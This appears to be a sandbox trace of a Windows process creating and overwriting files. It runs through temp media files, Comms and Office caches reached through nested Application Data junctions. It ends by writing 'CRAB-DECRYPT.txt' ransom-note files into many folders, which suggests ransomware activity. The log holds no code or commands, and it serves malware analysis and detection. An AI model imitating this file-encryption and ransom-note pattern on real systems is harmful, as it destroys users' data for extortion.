Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\F-PsEooiB7-oXDbtz1id.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\fAfwVeyGLAK7P93Obz3Y.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\hf1D.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\hLFQVM89GDd j6TcCek.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\iEyof2ITfx5.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\KAwEoER.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\l5sTDgUGeyhDz.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\LtnS7XaVnVQol2Qn1xH.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\mLE9mf-BdFdOibSg9l.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\oUGX-5zbSZw.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\QZg7oH35.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\R6QY5M2ifYeXIFzAbryD.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Rw3B6OL.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\SDaC6UaMD-p1Jk.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\tVTfmiVg4ragt74J-.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\vO1f0VBn.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\WjWFRmK.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\XL3UQ.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\YO5CdbmrFGoGb.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\ySgEVn.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\z28ae.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\_E9_ON r.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Temp\CalendarCache.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Unistore\data\AggregateCache.uca desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\store.vol desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\tmp.edb desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USS.chk desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USS.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USSres00001.jrs desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USSres00002.jrs desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USStmp.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\ngen.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\ngen.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds\FeedsStore.feedsdb-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\FORMS\FRMDATA64.DAT desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\GameDVR\KnownGameList.bin desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\excel.exe_Rules.xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\mspub.exe_Rules.xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\officec2rclient.exe_Rules.xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\outlook.exe_Rules.xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\powerpnt.exe_Rules.xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\setup.exe_Rules.xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\winword.exe_Rules.xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\-e jJuv2TeKL.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\-ZZr9xYkqr28kj4Ewly.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\0rGnGm QreoWsur9e.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\1dIAUE6JjxOcRnUgYL.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\1wJk.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\2GRWsBis.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\2nz3uSwqyVXWxqCOCF18.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\4229bD.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dBLEEVc8Nl3ui3b.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\DdyE 50uK2L.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dPo3pQlaA.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\F-PsEooiB7-oXDbtz1id.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\fAfwVeyGLAK7P93Obz3Y.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\hf1D.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\hLFQVM89GDd j6TcCek.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\iEyof2ITfx5.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\KAwEoER.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\l5sTDgUGeyhDz.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\LtnS7XaVnVQol2Qn1xH.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\mLE9mf-BdFdOibSg9l.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\oUGX-5zbSZw.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\QZg7oH35.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\R6QY5M2ifYeXIFzAbryD.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Rw3B6OL.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\SDaC6UaMD-p1Jk.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\tVTfmiVg4ragt74J-.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\vO1f0VBn.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\WjWFRmK.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\XL3UQ.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\YO5CdbmrFGoGb.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\ySgEVn.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\z28ae.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\_E9_ON r.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\TileDataLayer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\TileDataLayer\Database\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\VirtualStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
